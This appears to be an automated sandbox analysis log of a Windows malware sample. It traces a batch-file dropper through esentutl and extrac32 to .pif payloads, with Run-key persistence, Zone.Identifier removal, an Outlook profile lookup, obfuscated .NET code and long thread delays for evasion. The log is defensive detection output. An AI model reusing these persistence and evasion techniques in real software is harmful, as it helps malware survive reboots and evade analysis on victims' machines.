                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                  Source: z1Transaction_ID_REF2418_cmd.bat Static file information: File size 1139107 > 1048576
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
                  Source: Binary string: easinvoker.pdbH source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.0000000003004000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003000000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021720000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021751000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr

                  Data Obfuscation

                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack
                  Source: Yara match File source: 3.2.x.exe.31c0000.0.unpack, type: UNPACKEDPE
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: xrbjyllC.pif.3.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D894C LoadLibraryW,GetProcAddress,FreeLibrary, 3_2_031D894C
                  Source: alpha.pif.6.dr Static PE information: section name: .didat
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C332C push eax; ret 3_2_031C3368
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031CC349 push 8B031CC1h; ret 3_2_031CC34E
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031EC378 push 031EC56Eh; ret 3_2_031EC566
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C63B0 push 031C640Bh; ret 3_2_031C6403
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C63AE push 031C640Bh; ret 3_2_031C6403
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031ED2FC push 031ED367h; ret 3_2_031ED35F
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DF108 push ecx; mov dword ptr [esp], edx 3_2_031DF10D
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031ED144 push 031ED1ECh; ret 3_2_031ED1E4
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031ED1F8 push 031ED288h; ret 3_2_031ED280
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D306C push 031D30B9h; ret 3_2_031D30B1
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D306B push 031D30B9h; ret 3_2_031D30B1
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031ED0AC push 031ED125h; ret 3_2_031ED11D
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C6784 push 031C67C6h; ret 3_2_031C67BE
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C6782 push 031C67C6h; ret 3_2_031C67BE
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031EC570 push 031EC56Eh; ret 3_2_031EC566
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031CC56C push ecx; mov dword ptr [esp], edx 3_2_031CC571
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031CD5A0 push 031CD5CCh; ret 3_2_031CD5C4
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031CCBEC push 031CCD72h; ret 3_2_031CCD6A
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031CCA1E push 031CCD72h; ret 3_2_031CCD6A
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03234A50 push eax; ret 3_2_03234B20
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DAADF push 031DAB18h; ret 3_2_031DAB10
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D8AD8 push 031D8B10h; ret 3_2_031D8B08
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031DAAE0 push 031DAB18h; ret 3_2_031DAB10
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D790C push 031D7989h; ret 3_2_031D7981
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D6948 push 031D69F3h; ret 3_2_031D69EB
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D6946 push 031D69F3h; ret 3_2_031D69EB
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D886C push 031D88AEh; ret 3_2_031D88A6
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D2F60 push 031D2FD6h; ret 3_2_031D2FCE
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031D5E7C push ecx; mov dword ptr [esp], edx 3_2_031D5E7E
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_0041C40C push cs; iretd 9_2_0041C4E2
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Code function: 9_2_00423149 push eax; ret 9_2_00423179
                  Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
                  Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Cllyjbrx.PIF
                  Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\xrbjyllC.pif
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif File created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                  Source: C:\Windows\System32\extrac32.exe File created: C:\Users\user\AppData\Local\Temp\x.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\x.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cllyjbrx
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_031DAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_031DAB1C
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Libraries\xrbjyllC.pif | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Memory allocated: 27F60000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Memory allocated: 29C90000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Memory allocated: 29A90000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Memory allocated: 24F10000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Memory allocated: 26F50000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Memory allocated: 26D70000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Memory allocated: 206D0000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Memory allocated: 22710000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Memory allocated: 22320000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 9_2_004019F0
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 599875
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 599766
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 599656
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 599547
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 599438
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 599313
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 599203
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 599094
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 598969
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 598860
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 598735
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 598610
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 598485
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 598360
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 598222
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 598068
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 597946
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 597719
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 597610
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 597485
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 597360
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 597235
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 597110
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 596981
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 596875
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 596767
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 596640
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 596528
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 596416
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 596304
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 596188
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 596050
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 595938
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 595810
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 595698
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 595585
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 595249
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 595123
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 594911
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 594789
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 594677
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 594564
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 594439
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 594313
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 594177
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 593997
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 593860
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 593658
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 593506
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Thread delayed: delay time: 593369
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593196Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 593011Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 592620Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 592105Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 591918Jump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifThread delayed: delay time: 591659Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599891
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599344
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599124
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599007
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598891
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598780
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598422
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598297
